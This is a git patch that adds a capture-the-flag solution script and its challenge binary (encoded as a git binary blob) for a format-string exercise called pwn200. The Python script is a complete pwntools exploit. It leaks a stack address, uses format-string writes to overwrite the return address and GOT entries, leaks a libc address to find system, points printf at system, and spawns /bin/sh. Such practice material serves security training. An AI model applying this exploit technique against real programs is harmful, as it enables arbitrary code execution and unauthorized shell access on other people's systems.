From 24dada49cac52b1565198474cb87b582fddb93c4 Mon Sep 17 00:00:00 2001
From: Jack Ren <bjrjk@qq.com>
Date: Fri, 17 Sep 2021 16:36:32 +0800
Subject: [PATCH] Finished format-string/pwn200

---
 format-string/pwn200/answer.py |  79 +++++++++++++++++++++++++++++++++
 format-string/pwn200/pwne      | Bin 0 -> 5564 bytes
 2 files changed, 79 insertions(+)
 create mode 100644 format-string/pwn200/answer.py
 create mode 100755 format-string/pwn200/pwne

diff --git a/format-string/pwn200/answer.py b/format-string/pwn200/answer.py
new file mode 100644
index 0000000..4d2df54
--- /dev/null
+++ b/format-string/pwn200/answer.py
@@ -0,0 +1,79 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./pwne')
+elf = ELF('./pwne')
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.recvuntil("GET YOUR NAME:\n\n")
+p.sendline("%p\n\x00")
+p.recvuntil("WELCOME \n")
+buf_shift = int(p.recvuntil("\n"), 16)
+ret_addr = buf_shift + 0x50
+p.sendline("10")
+
+puts_got = elf.got['puts']
+puts_plt = elf.plt['puts']
+printf_got = elf.got['printf']
+main_sym = 0x80485CD
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.recvuntil("GET YOUR NAME:\n\n")
+payload = fmtstr_payload(7, 
+    {
+        ret_addr: puts_plt
+    }
+)
+p.sendline(payload)
+p.recvuntil("WELCOME \n")
+p.sendline("10")
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.recvuntil("GET YOUR NAME:\n\n")
+payload = fmtstr_payload(7, 
+    {
+        ret_addr + 4: main_sym
+    }
+)
+p.sendline(payload)
+p.recvuntil("WELCOME \n")
+p.sendline("10")
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.recvuntil("GET YOUR NAME:\n\n")
+payload = fmtstr_payload(7, 
+    {
+        ret_addr + 8: puts_got
+    }
+)
+p.sendline(payload)
+p.recvuntil("WELCOME \n")
+p.sendline("10")
+
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("NY")
+puts_libc = u32(p.recv(4))
+print(hex(puts_libc))
+
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+print("base libc: %s" % hex(libc_base))
+system_libc = libc_base + libc.dump('system')
+print("system libc: %s" % hex(system_libc))
+
+p.recvuntil("GET YOUR NAME:\n\n")
+payload = fmtstr_payload(7, {printf_got: system_libc})
+p.sendline(payload)
+p.sendline("10")
+p.recvuntil("WANT PLAY[Y/N]\n")
+p.sendline("Y")
+p.sendline("/bin/sh")
+p.interactive()
\ No newline at end of file
diff --git a/format-string/pwn200/pwne b/format-string/pwn200/pwne
new file mode 100755
index 0000000000000000000000000000000000000000..608a91eeafae4c2c7a836449d67fccfb504e8201
GIT binary patch
literal 5564
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

literal 0
HcmV?d00001